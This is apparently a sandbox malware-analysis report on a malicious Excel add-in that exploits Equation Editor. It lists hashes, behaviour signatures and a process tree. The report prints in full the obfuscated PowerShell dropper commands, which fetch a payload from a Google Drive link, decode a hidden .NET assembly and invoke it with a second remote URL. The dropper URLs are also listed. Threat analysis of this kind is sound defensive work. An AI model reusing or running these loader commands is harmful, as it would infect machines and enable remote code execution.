Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    22-10-2024 01:01

General

  • Target

    756a9f9016b69053d2fda277be628f93f629d0a45299bc88bd8a95b2722464af.xlam

  • Size

    719KB

  • MD5

    c76d319f7177a7c65c84b13ef366a747

  • SHA1

    23548c316070c88a68b3cd68ae4c708eba91e110

  • SHA256

    756a9f9016b69053d2fda277be628f93f629d0a45299bc88bd8a95b2722464af

  • SHA512

    33f26f9a0eafedee6c1958425072f8c8f9d9f2dcfd31a5e7b1bc34d9c997632ce15a572c0d6c34e105a602a233ad7dca2eb24dbe68ad788077f402eafa29a9c1

  • SSDEEP

    12288:nb7e6DDgasCeaepqrZojpvKievCqWM2KZLwgn7QbBt4slfofgHz8nOZzcEkQ:by0ETFaQqripJzqWM2KZkGKXlfo8zRZt

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp

exe.dropper

https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\756a9f9016b69053d2fda277be628f93f629d0a45299bc88bd8a95b2722464af.xlam
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2260
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Mondayyy.vbs"
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFBTaG9tRVs0XSskUFNoT21FWzM0XSsneCcpICgoKCdqQ3lpbWFnZVVybCA9IGZ5Umh0dHBzJysnOi8vZHJpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS1XZGdlcTBmWDlhQXBkbFNXOWRsbjFQY19LRUdwZkhwIGZ5UjtqQ3l3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50O2pDeWltYWdlQnl0ZXMgPSBqQ3l3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGpDeWltYWdlVScrJ3JsKTtqQycrJ3lpbWFnZVQnKydleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhqQ3lpbWFnZUJ5dGVzKTtqQ3lzdGFydEZsYWcgJysnPScrJyBmeVI8PEJBU0U2NF9TVEFSVD4+ZnlSO2pDeWVuZEZsYWcgPSBmeVI8PEJBU0U2JysnNF9FTkQ+PmZ5UjtqQ3lzdGFydEluZGV4ID0gakN5aW1hZ2VUZXh0LkluZGV4T2YoakN5Jysnc3RhcnRGbGFnKTtqQ3llbmRJbmRleCAnKyc9IGpDeWltYWdlJysnVGV4dC5JbicrJ2RleE9mKGpDeWVuZEZsYWcpO2pDeXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBqQ3llbmRJbmRleCAtZ3QgakN5c3RhcnRJbmQnKydleDtqQ3lzdGFydEluZGV4ICs9IGpDeXN0YXJ0RmxhZy5MZW5ndGg7akN5YmFzZTY0TGVuZ3RoID0gJysnakN5ZW4nKydkSW5kZXggLSBqQ3lzdGFydEluZGV4O2pDeWJhc2U2NENvbW1hbmQgPSBqQ3lpbWFnZVQnKydleHQuU3Vic3RyaW5nKGpDeXN0YXJ0SW5kZXgsIGpDeWJhc2U2NExlbmd0aCk7aicrJ0N5YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoakN5YmFzZTY0Q29tbScrJ2FuJysnZC5Ub0NoYScrJ3JBcnJheSgpIHQ5WiBGb3JFYWNoLU9iamVjdCB7IGpDeV8gfSlbLTEuLi0oakN5YmFzJysnZTY0JysnQ29tbWFuZC5MZW5ndGgpXTtqQ3ljb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKGpDeWJhc2U2NFJldmVyc2VkKTtqQ3lsb2FkZWRBc3MnKydlJysnbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoakN5Y29tbWFuZEJ5JysndGVzKTtqQ3l2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGZ5UlZBSWZ5Uik7akN5dmFpTWV0aG9kLkludm9rZShqQ3ludWxsLCBAKGZ5UnR4dC5rY2FieWFkdHNyaUYvODguMDYuJysnNScrJzkuMzIvLzpwdHQnKydoZnknKydSLCBmeVJkZXNhdGl2YWRvZnlSLCBmeVJkZXNhdGl2YWRvZnlSLCBmJysneVJkZXNhdGl2YWRvZnlSLCBmeVJBZGRJblByb2NlJysnc3MzMmZ5UiwgZnlSZGVzYXRpdmFkb2Z5UiwgZnlSZGVzYXRpdmFkb2Z5UixmeVJmeVIsZnlSZnlSLGZ5UmZ5UixmeScrJ1JmJysneVIsZnlSZnlSLGZ5UjFmeVIpKTsnKSAgLVJFUGxBQ0UgIChbY2hBcl0xMTYrW2NoQXJdNTcrW2NoQXJdOTApLFtjaEFyXTEyNCAtUkVQbEFDRShbY2hBcl0xMDIrW2NoQXJdMTIxK1tjaEFyXTgyKSxbY2hBcl0zOSAtQ3JFUExhQ2UgICdqQ3knLFtjaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $PShomE[4]+$PShOmE[34]+'x') ((('jCyimageUrl = fyRhttps'+'://drive.google.com/uc'+'?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp fyR;jCywebClient = New-Object System'+'.Net.WebClient;jCyimageBytes = jCyw'+'ebClient.DownloadData(jCyimageU'+'rl);jC'+'yimageT'+'ext = [System.Text.Encoding]::UTF8.GetString(jCyimageBytes);jCystartFlag '+'='+' fyR<<BASE64_START>>fyR;jCyendFlag = fyR<<BASE6'+'4_END>>fyR;jCystartIndex = jCyimageText.IndexOf(jCy'+'startFlag);jCyendIndex '+'= jCyimage'+'Text.In'+'dexOf(jCyendFlag);jCystartIndex -ge 0 -and jCyendIndex -gt jCystartInd'+'ex;jCystartIndex += jCystartFlag.Length;jCybase64Length = '+'jCyen'+'dIndex - jCystartIndex;jCybase64Command = jCyimageT'+'ext.Substring(jCystartIndex, jCybase64Length);j'+'Cybase64Reversed = -join (jCybase64Comm'+'an'+'d.ToCha'+'rArray() t9Z ForEach-Object { jCy_ })[-1..-(jCybas'+'e64'+'Command.Length)];jCycommandBytes = [System.Convert]::FromBase64Stri'+'ng(jCybase64Reversed);jCyloadedAss'+'e'+'mbly = [System.Reflection.Assembly]::Load(jCycommandBy'+'tes);jCyvaiMethod = [dnlib.IO.Home].GetMethod(fyRVAIfyR);jCyvaiMethod.Invoke(jCynull, @(fyRtxt.kcabyadtsriF/88.06.'+'5'+'9.32//:ptt'+'hfy'+'R, fyRdesativadofyR, fyRdesativadofyR, f'+'yRdesativadofyR, fyRAddInProce'+'ss32fyR, fyRdesativadofyR, fyRdesativadofyR,fyRfyR,fyRfyR,fyRfyR,fy'+'Rf'+'yR,fyRfyR,fyR1fyR));') -REPlACE ([chAr]116+[chAr]57+[chAr]90),[chAr]124 -REPlACE([chAr]102+[chAr]121+[chAr]82),[chAr]39 -CrEPLaCe 'jCy',[chAr]36) )"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2744

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    be007b24ec37ed1d7bab28db3e272281

    SHA1

    62e456a8d2b619daabcadab781e9f930ffefff11

    SHA256

    a1c7d0853eb77fde640536f1e61417740aab444dc87b29507c5c33d079478236

    SHA512

    30df2d442f726778894002049f78758f468269131da30d768866e39a11ef7023f51d5b6c634c76f9631e2c2978521137dc07f6d364c0c8a902889eedb0cd8d8e

  • C:\Users\Admin\AppData\Roaming\Mondayyy.vbs

    Filesize

    2KB

    MD5

    590ddf122e578bbc4d925c1df8a8acbf

    SHA1

    ca4fdc823bd59eba301e092ffb7541b614cf3f75

    SHA256

    8fd47bd19dc4a4487788ed0f117afaf4155d30616082da7a3f6f1db17e65221d

    SHA512

    666e0566124b15e8441ebe4e2542577a1f990d8ec3aecaf7c43980226d8e8c21a89cfd43e79e85ecaf48af7430876d422e3bacea0e77b9b1576e47b4f58e58cb

  • memory/2260-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2260-1-0x0000000072BED000-0x0000000072BF8000-memory.dmp

    Filesize

    44KB

  • memory/2260-16-0x0000000072BED000-0x0000000072BF8000-memory.dmp

    Filesize

    44KB